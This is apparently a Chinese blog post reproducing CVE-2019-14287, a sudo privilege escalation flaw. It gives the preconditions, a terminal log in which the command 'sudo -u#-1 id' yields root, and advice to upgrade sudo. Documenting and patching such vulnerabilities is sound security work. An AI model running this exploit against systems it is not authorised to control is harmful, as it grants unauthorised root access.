[漏洞復現]CVE-2019-14287 sudo提權漏洞
漏洞描述
2019年10月14日,CVE官方發佈了CVE-2019-14287的漏洞預警。經過特定payload,用戶可提高至root權限。
利用前提shell
- sudo -v < 1.8.28
- 知道當前用戶的密碼
- 當前用戶存在於sudo權限列表
漏洞復現
mark@mark-Pc:~$ id uid=1000(mark) gid=1000(mark) 組=1000(mark),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) mark@mark-Pc:~$ sudo -u#-1 id [sudo] mark 的密碼: uid=0(root) gid=1000(mark) 組=1000(mark)
修復建議
- 升級sudo到1.8.28版本
- 作好sudo用戶列表管理
相關文章
- 1. Sudo提權漏洞復現
- 2. 【漏洞公告】CVE-2017-1000367:Sudo本地提權漏洞
- 3. CVE-2019-14287:sudo 權限提高漏洞
- 4. sudo提權漏洞(CVE-2019-14287)
- 5. CVE-2017-1000367:Sudo本地提權漏洞
- 6. 漏洞總結-linux提權漏洞
- 7. [提權]CVE-2018-8120漏洞復現
- 8. Ubuntu 提權漏洞(CVE-2019-7304)復現
- 9. Linux sudo權限提高漏洞(CVE-2021-3156)復現
- 10. CVE漏洞sudo提權 CVE-2019-14287 簡單復現
- 更多相關文章...
- • Rust 所有權 - RUST 教程
- • ionic 複選框 - ionic 教程
- • ☆基於Java Instrument的Agent實現
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章